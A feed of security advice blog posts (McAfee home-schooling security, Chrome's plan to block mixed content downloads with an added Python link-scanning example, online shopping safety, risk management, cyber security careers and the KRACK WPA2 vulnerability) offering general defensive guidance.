Security basics on your home computer and laptop

If your child is using a home computer or laptop, or sharing one with other members of the family, you’ll want to ensure that it’s protected. This includes a full security suite that features more than just anti-virus: firewall protection to keep hackers at bay, safe browsing tools that steer you clear of sketchy or unsafe websites, and perhaps even parental controls to block distracting apps and inappropriate websites. Another smart option is to use a password manager. There’s a good chance that your kids will need to create new accounts for new learning resources—and with those come new usernames and passwords. A password manager will organize them and keep them safe.

Video conferencing

Additionally, you’ll want to take a very close look at the video conferencing tools that your child might be using to connect with teachers and classmates (and even their friends after schooltime is over). First off, there are plenty of them out there. Secondly, some video conferencing tools have allegedly experienced security and privacy issues in recent weeks. Before downloading and installing a video conferencing tool, do a little online research to see how secure it is and what privacy policies it has in place.

Look for video conferencing tools that use end-to-end encryption so that the conference is protected from prying eyes and so that others can’t intrude upon the conversation uninvited. Look for articles from reputable sources too, as there have been further reports of privacy issues where certain user information has been shared with third parties while using the video conferencing tool. That’s good advice for any software, apps, or tools you may wish to add.

Use a VPN

Another way to protect yourself from intrusions while conferencing, or doing anything else online for that matter, is to introduce a VPN (virtual private network). Choose one that uses bank-level encryption to keep your personal data and activities private from hackers. It will also hide other information, like account credentials, credit card numbers, and the like. It’s a good move, and it’s easy to use.

Next up

Look for our upcoming articles where we’ll share some specific ideas that can help make homeschooling online a little easier.

To stay updated on all things McAfee and for more resources on staying secure from home, follow @McAfee_Home on Twitter, listen to our podcast Hackable?, and ‘Like’ us on Facebook.




The post School from Home: “Square One” Basics appeared first on McAfee Blogs.

Protecting users from insecure downloads in Google Chrome

Update (04/06/2020): Chrome was originally scheduled to start user-visible warnings on mixed downloads in Chrome 82. These warnings, as well as subsequent blocking, will be delayed by at least two releases. Console warnings on mixed downloads will begin as scheduled in Chrome 81.

At this time, we expect to start user-visible warnings in Chrome 84. The Chrome Platform Status entry will be kept up-to-date as timing is finalized. Developers who are otherwise able to do so are encouraged to transition to secure downloads as soon as possible to avoid future disruption.

Today we’re announcing that Chrome will gradually ensure that secure (HTTPS) pages only download secure files. In a series of steps outlined below, we’ll start blocking "mixed content downloads" (non-HTTPS downloads started on secure pages). This move follows a plan we announced last year to start blocking all insecure subresources on secure pages.
Insecurely-downloaded files are a risk to users' security and privacy. For instance, insecurely-downloaded programs can be swapped out for malware by attackers, and eavesdroppers can read users' insecurely-downloaded bank statements. To address these risks, we plan to eventually remove support for insecure downloads in Chrome.
As a first step, we are focusing on insecure downloads started on secure pages. These cases are especially concerning because Chrome currently gives no indication to the user that their privacy and security are at risk.
Starting in Chrome 82 (to be released April 2020), Chrome will gradually start warning on, and later blocking, these mixed content downloads. File types that pose the most risk to users (e.g., executables) will be impacted first, with subsequent releases covering more file types. This gradual rollout is designed to mitigate the worst risks quickly, provide developers an opportunity to update sites, and minimize how many warnings Chrome users have to see.
We plan to roll out restrictions on mixed content downloads on desktop platforms (Windows, macOS, Chrome OS and Linux) first. Our plan for desktop platforms is as follows:

  • In Chrome 81 (released March 2020) and later:
    • Chrome will print a console message warning about all mixed content downloads.
  • In Chrome 82 (released April 2020):
    • Chrome will warn on mixed content downloads of executables (e.g. .exe).
  • In Chrome 83 (released June 2020):
    • Chrome will block mixed content executables
    • Chrome will warn on mixed content archives (.zip) and disk images (.iso).
  • In Chrome 84 (released August 2020):
    • Chrome will block mixed content executables, archives and disk images
    • Chrome will warn on all other mixed content downloads except image, audio, video and text formats.
  • In Chrome 85 (released September 2020):
    • Chrome will warn on mixed content downloads of images, audio, video, and text
    • Chrome will block all other mixed content downloads
  • In Chrome 86 (released October 2020) and beyond, Chrome will block all mixed content downloads.
(Figure: Example of a potential warning)
Chrome will delay the rollout for Android and iOS users by one release, starting warnings in Chrome 83. Mobile platforms have better native protection against malicious files, and this delay will give developers a head-start towards updating their sites before impacting mobile users.
Developers can prevent users from ever seeing a download warning by ensuring that downloads only use HTTPS. In the current version of Chrome Canary, or in Chrome 81 once released, developers can activate a warning on all mixed content downloads for testing by enabling the "Treat risky downloads over insecure connections as active mixed content" flag at chrome://flags/#treat-unsafe-downloads-as-active-content.
Enterprise and education customers can disable blocking on a per-site basis via the existing InsecureContentAllowedForUrls policy by adding a pattern matching the page requesting the download.
In the future, we expect to further restrict insecure downloads in Chrome. We encourage developers to fully migrate to HTTPS to avoid future restrictions and fully protect their users. Developers with questions are welcome to email us at
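To help developers find downloads that the schedule above will warn on or block, here is an added example that is not Chrome's or the Chromium project's code: a static scan of an HTTPS page's HTML for links that would start a mixed content download, mapped to the desktop release in which Chrome first warns on and first blocks that category. The extension lists beyond .exe, .zip and .iso, the `download`-attribute rule and the sample page are assumptions.

```python
# Added example, not Chrome's or the Chromium project's code: scan the HTML of an
# https:// page for links that would start a mixed content download (an http://
# file from an https:// page) and map each to the desktop release, from the
# schedule above, in which Chrome first warns on it and first blocks it. The
# extension lists beyond .exe/.zip/.iso and the 'download'-attribute rule are
# assumptions; the sample page is constructed.
import os
from html.parser import HTMLParser
from urllib.parse import urljoin, urlsplit

# Category -> (first release that warns, first release that blocks), desktop plan.
# The April 2020 update above delays the user-visible steps by at least two releases.
SCHEDULE = {
    'executable': (82, 83),
    'archive': (83, 84),
    'disk_image': (83, 84),
    'other': (84, 85),
    'media_or_text': (85, 86),
}
EXTENSIONS = {  # assumed membership; the post names .exe, .zip and .iso explicitly
    'executable': {'.exe', '.msi', '.dmg', '.apk'},
    'archive': {'.zip', '.7z', '.rar', '.tar', '.gz'},
    'disk_image': {'.iso', '.img'},
    'media_or_text': {'.png', '.jpg', '.gif', '.mp3', '.mp4', '.txt'},
}


class _LinkCollector(HTMLParser):
    def __init__(self):
        super().__init__()
        self.links = []  # (href, has an explicit download attribute)

    def handle_starttag(self, tag, attrs):
        if tag == 'a':
            attrs = dict(attrs)
            if attrs.get('href'):
                self.links.append((attrs['href'], 'download' in attrs))


def classify(url):
    """Download category of a URL by extension, or None if it does not look like a download."""
    ext = os.path.splitext(urlsplit(url).path)[1].lower()
    for category, exts in EXTENSIONS.items():
        if ext in exts:
            return category
    return None


def find_mixed_downloads(page_url, html):
    """Links on an https:// page whose resolved target is http:// and looks like a download."""
    if urlsplit(page_url).scheme != 'https':
        return []  # the rollout concerns downloads started on secure pages only
    collector = _LinkCollector()
    collector.feed(html)
    findings = []
    for href, explicit_download in collector.links:
        url = urljoin(page_url, href)  # resolves relative and protocol-relative hrefs
        # An unknown extension counts only when the link carries `download`; a
        # static scan cannot see Content-Disposition headers sent by the server.
        category = classify(url) or ('other' if explicit_download else None)
        if category is None or urlsplit(url).scheme != 'http':
            continue
        warn, block = SCHEDULE[category]
        findings.append({'url': url, 'category': category, 'warn': warn, 'block': block})
    return findings


# Constructed sample page (no real site), served from an https:// URL.
PAGE_URL = 'https://example.test/software/'
SAMPLE_HTML = """
<a href="http://dl.example.test/setup.exe">Installer</a>
<a href="https://dl.example.test/setup.exe">Installer (already secure)</a>
<a href="//cdn.example.test/bundle.zip">Bundle (protocol-relative, inherits https)</a>
<a href="http://dl.example.test/image.iso">Disk image</a>
<a href="http://dl.example.test/report.pdf" download>Report</a>
<a href="http://dl.example.test/logo.png">Logo</a>
<a href="http://www.example.test/about.html">About (a navigation, not a download)</a>
"""

if __name__ == '__main__':
    for f in find_mixed_downloads(PAGE_URL, SAMPLE_HTML):
        print(f"{f['url']}: {f['category']}, warn in Chrome {f['warn']}, block in {f['block']}")
```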

Secure IT: Shop Safe Online

Everything we do on a daily basis has some form of “trust” baked into it. Where you live, what kind of car you drive, where you send your children to school, who you consider good friends, what businesses you purchase from, etc. Trust instills a level of confidence that your risk is minimized and acceptable to you. Why should this philosophy be any different when the entity you need to trust is on the other end of an Internet address? In fact, because you are connecting to an entity that you cannot see or validate, a higher level of scrutiny is required before they earn your trust. What Universal Resource Locator (URL) are you really connecting to? Is it really your banking website or new online shopping website that you are trying for the first time? How can you tell?

It’s a jungle out there. So we’ve put together five ways you can stay safe while you shop online:

  1. Shop at sites you trust. Are you looking at a nationally or globally recognized brand? Do you have detailed insight into what the site looks like? Have you established an account on this site, and is there a history that you can track for when you visit and what you buy? Have you linked the valid URL for the site in your browser? Mistyping a URL in your browser for any site you routinely visit can lead you to a rogue website.

  2. Use secure networks to connect. Just as important as paying attention to what you connect to is to be wary of where you connect from. Your home Wi-Fi network that you trust—okay. An open Wi-Fi at an airport, cyber café, or public kiosk—not okay. If you can’t trust the network, do not enter identifying information or your payment card information. Just ask our cybersecurity services experts to demonstrate how easy it is to compromise an open Wi-Fi network, and you’ll see why we recommend against public Wi-Fi for sensitive transactions.

  3. Perform basic checks in your browser. Today’s modern browsers are much better at encrypted and secure connections than they were a few years ago. They use encrypted communication by leveraging a specific Internet protocol, hypertext transfer protocol secure (HTTPS). This means that there is a certificate associated with this site in your browser that is verified before you are allowed to connect and establish the encrypted channel. (Just so you know, yes, these certificates can be spoofed, but that is a problem for another day). How do you check for this certificate? Look up in your browser title bar.

  4. Create strong passwords for your shopping sites. This issue is covered in another blog post, but use longer passwords, 10–12 characters, and keep them in a safe place that cannot be compromised by an unauthorized person. If a second factor is offered, use it. Many sites will send a code to your smartphone to type into a login screen to verify you are who you say you are.

  5. Don’t give out information about yourself that seems unreasonable. If you are being asked for your social security number, think long and hard, and then longer and harder, about why that information should be required. And then don’t do it until you ask a trusted source about why that would be necessary. Be wary of anything you see when you are on a website that does not look familiar or normal.

We all use the Internet to shop. It is super convenient, and the return on investment is awesome. Having that new cool thing purchased in 10 minutes and delivered directly to your door—wow! Can you ever really be 100% sure that the Internet site you are visiting is legitimate, and that you are not going to inadvertently give away sensitive and/or financial information that is actually going directly into a hacker’s data collection file? Unfortunately, no. A lot of today’s scammers are very sophisticated. But as we discussed up front, this is a trust- and risk-based decision, and if you are aware that you could be compromised at any time on the Internet and are keeping your eyes open for things that just don’t look right or familiar, you have a higher probability of a safe online shopping experience.

To recap:

  • Visit and use sites you know and trust
  • Keep the correct URLs in your bookmarks (don’t risk mistyping a URL).
  • Check the certificate to ensure your connection to the site is secured by a legitimate and active certificate.
  • Look for anything that is not familiar to your known experience with the site.
  • If you can, do not save credit card or payment card information on the site. (If you do, you need to be aware that if that site is breached, your payment data is compromised.)
  • Use strong passwords for your shopping site accounts. And use a different password for every site. (No one ring to rule them all!)
  • If a site offers a second factor to authenticate you, use it.
  • Check all your payment card statements regularly to look for rogue purchases.
  • Subscribe to an identity theft protection service if you can. These services will alert you if your identity has been compromised.

Safe shopping!

The post Secure IT: Shop Safe Online appeared first on Connected.

Be a Conscientious Risk Manager

Whether you are a CIO or CISO in the Federal, State or Local, Education, or Commercial Business areas, you are all faced with the same challenge, whether you accept it or not. In the security risk management world, if the malicious actor wants into your network, they will figure out a way to get in. You of course still need to build a comprehensive risk governance and management plan, but that plan must be built on the premise of how you will respond when the breach occurs.

Having spent 38 years in Information Security, the one constant that I see, is that the individuals who make it their business to steal or disrupt your data, are better funded, better trained, and have unlimited hours to execute their trade. What we hope to achieve is being a half-step behind them at worst case. There is no way to stay in step, and a step ahead is out of the question.

So what does this really mean to the conscientious risk manager? Create a strategy whereby you frequently identify the threat, and measure the risk against that threat in your as-built infrastructure. Test frequently, outside and inside, using the same tools and techniques the malicious actors use. Test user security awareness, as we know it only takes one click on a phishing email’s malicious link to potentially bring down an entire enterprise. Measure, document, prioritize, and build a risk roadmap strategy to keep risk mitigation focused on the most critical exploitable areas.

Three Top Security Imperatives
Keep in mind that your top three security imperatives are: reducing your threat exposure, enhancing your response and recovery times, and increasing security visibility. What does security visibility mean? Implementing the people, process, and technology in key security areas to give you a fighting chance to detect and react to malicious and advanced persistent threats.

Let’s talk people, process, and technology. We all know users are the weakest link in any security chain. Not because they have sinister intent, although sometimes they do, but primarily because in today’s high-powered technical, mobile, and social world, it is commonplace for a lapse in judgment to occur. We live in a rapid-fire, high-availability, high-output world, and mistakes can and will be made. So make it less commonplace: train and educate often, and monitor closely for when that lapse in judgment occurs.

Process: Again our high-powered technical, mobile, and social world often demands we run at warp speed.  Who has time to document? Well — make the time.  Good documentation to include process, policies and standards, as well as a documented and managed configuration control process, will help keep you more secure. Every process, policy and standard document has to have an assigned owner, has to have a designated review date, and has to have an oversight or governance process. All roles and responsibilities need to be included in the documentation, and the expected outcome needs to be defined. Make the time to prepare and socialize your critical information security program documentation.

Technology: Many risk owners fall prey to purchasing every piece of security technology available, at what I like to call the security “choke points”, end-point, network, edge, gateway, etc. This is just what everyone does. However, why not use the process we discussed above — measure, document, prioritize, and build a risk roadmap strategy — as your guideline for what you purchase and deploy for technology. Ask yourself — what is so wrong with selecting and implementing a product, only after you validate how it will help you manage your documented security risk? Of course the answer to that is — nothing.

Focus on Seamless Collaboration
You have documented your risk, you have prioritized your risk roadmap, and as a result you know the very specific technology, or set of technologies, you need to implement first. Most importantly, your technology selections should focus on products that collaborate in a seamless way. In other words, your end-point, edge, network, gateway, sandbox, etc., security technologies all talk to each other. We call this approach to complete security visibility across the whole landscape, Unified Security Stack. And, don’t forget that all technology must have a people and process component as well.

Good information security risk management and risk governance does not come by accident.  It takes planning and execution. In the end, although you may not keep the bad guy out, you will be better prepared for when.

The post Be a Conscientious Risk Manager appeared first on Connected.

Protecting Critical Infrastructure from Cyber Threats

The basic infrastructure that supports our daily lives is deeply dependent on the Internet, and, therefore, continually exposed to the risk of new threats and cyber attacks. As security breaches grow in frequency and sophistication every day, it’s crucial to build resiliency and then take steps to protect critical infrastructure to remain safe and secure online.

It’s important to identify current and future strategies to protect your infrastructure and manage your risk. Cyber security is one of the biggest challenges organizations face today. Regardless of size or industry, every organization must ask themselves, is my security strategy up to date? If your organization is looking to stay on the front line of cyber security, it’s imperative to know how an end-to-end risk management strategy can help you properly secure your infrastructure.

Our security experts have an abundance of experience, and several areas of expertise we can put to work for you. We are committed to keeping your organization safe and secure, and can help design, deploy, and support solutions to address your critical risks and defend your critical infrastructure. For more information, contact one of our security experts today!

The post Protecting Critical Infrastructure from Cyber Threats appeared first on Connected.

Protecting Critical Infrastructure

In this blog, the focus is on protecting critical infrastructure—the essential systems that support our daily lives such as the electric grid, financial institutions, and transportation. Unfortunately, attacks on critical infrastructure have become a concern worldwide. A devastating attack isn’t just a theoretical possibility anymore. As we’ve recently seen with Equifax, and other security breaches in healthcare and other industries, the growing threat of serious attacks on critical infrastructure is real. These days, hackers have become much more formidable, and we will undoubtedly see more of these attacks in the future. It’s no longer a matter of if there will be another attack, but when.

Protecting your infrastructure requires constant vigilance and attention to evolving cyber attacks. Risk is inherent in everything we do, so trying to stay ahead of the cyber security curve is key. Our team of security experts can help you build a security strategy to detect, protect, and react to the complete threat lifecycle. The threats we all need to manage today evolve quickly, and we can help you minimize your risk and maximize your defenses to improve your cyber resiliency.

The post Protecting Critical Infrastructure appeared first on Connected.

The Internet Wants YOU: Consider a Career in Cyber Security.

With the continuous state of change in the global threat landscape, organizations face cyber attacks and security breaches that are growing in frequency and sophistication every day. But now, consider this: according to a study by the Center for Cyber Safety and Education, there will be a shortage of 1.8 million information security workers by 2022. This gap should be of great concern to organizations.

Skilled people make the difference in protecting sensitive data, so it’s more critical than ever that organizations begin to attract and retain the cybersecurity talent needed to defend against the evolving threat landscape. At Connection, we help inspire individuals coming out of universities to engage in co-op or intern-related opportunities, and I strongly encourage other organizations to see what they can do to help young people today who are really interested in building their skills in this area.

The figures don’t lie. The demand for cyber security will only continue to grow. Through local collaborative efforts between employers, training providers, and community leaders, we can ensure individuals have the opportunity to build on their tech knowledge and participate in a secure, thriving economy.

The post The Internet Wants YOU: Consider a Career in Cyber Security. appeared first on Connected.

Cyber Security Careers Are in High Demand

It’s impossible to overstate the importance of security in today’s digital world. Cyber attacks are growing in frequency and sophistication every day, and a key risk to our economy and security is the lack of professionals to protect our growing networks. According to a study by the Center for Cyber Safety and Education, by 2022, there will be a shortage of 1.8 million information security workers. So, it’s critical that we begin now to prepare our students—and any others who are interested in making a career move—to fill these gaps. Many colleges and universities have developed information assurance programs that help technical, security-minded students achieve a great foundation in this industry. We also challenge corporations to offer intern and co-op opportunities for students in these degree programs, so they can see what security looks like in practical, business-world applications.

Connection is committed to promoting cyber security and online safety.  Cyber security is a viable and rewarding profession and we encourage people from all backgrounds to see information security as an essential career path.

The post Cyber Security Careers Are in High Demand appeared first on Connected.

WPA2 Hacks and You

The world has been rocked once again with a serious flaw in a basic security mechanism that we all take for granted to keep us safe and secure. According to Dark Reading, researchers at Belgium’s University of Leuven have uncovered as many as 10 critical vulnerabilities in the Wi-Fi Protected Access II (WPA2) protocol used to secure Wi-Fi networks. This is a protocol that—as we have all learned over the last several years—must be configured to keep us safe.

The key reinstallation attack—or KRACKs—impacts all modern wireless networks using the WPA2 protocol. The flaw gives attackers the ability to decrypt data packets that make all private (encrypted) communication no longer private. Although the flaw requires the attacker to have close proximity to the network to execute, this is especially bad news for those with far-reaching wireless signals—such as hotel and hospital lobbies—where an attacker can just sit down and work their trade.

The Vulnerability Notes Database provides a summary and detailed description of the vulnerabilities. It includes a list of vendors who may be affected by the vulnerability, and a status field indicating whether the vendor has any products that are affected.

What can you do?

Vendors are currently identifying their affected products and working on patches to address this attack. In the meantime, here are a few things you can do to keep your information safe:

  1. Apply patches as they are released
  2. Pay careful attention to your wireless environment
  3. Watch for people and technology that look out of place
  4. Utilize a trusted VPN solution
  5. When possible, transfer data over an encrypted channel—such as HTTPS
  6. Restrict sensitive information that would normally pass over a wireless network
  7. And, as always, it’s a good practice to monitor access logs and wireless traffic to look for anomalies in standard business communication

How has this Wi-Fi vulnerability affected your organization? Leave a comment below to share your experience and any additional advice you have for staying protected.

The post WPA2 Hacks and You appeared first on Connected.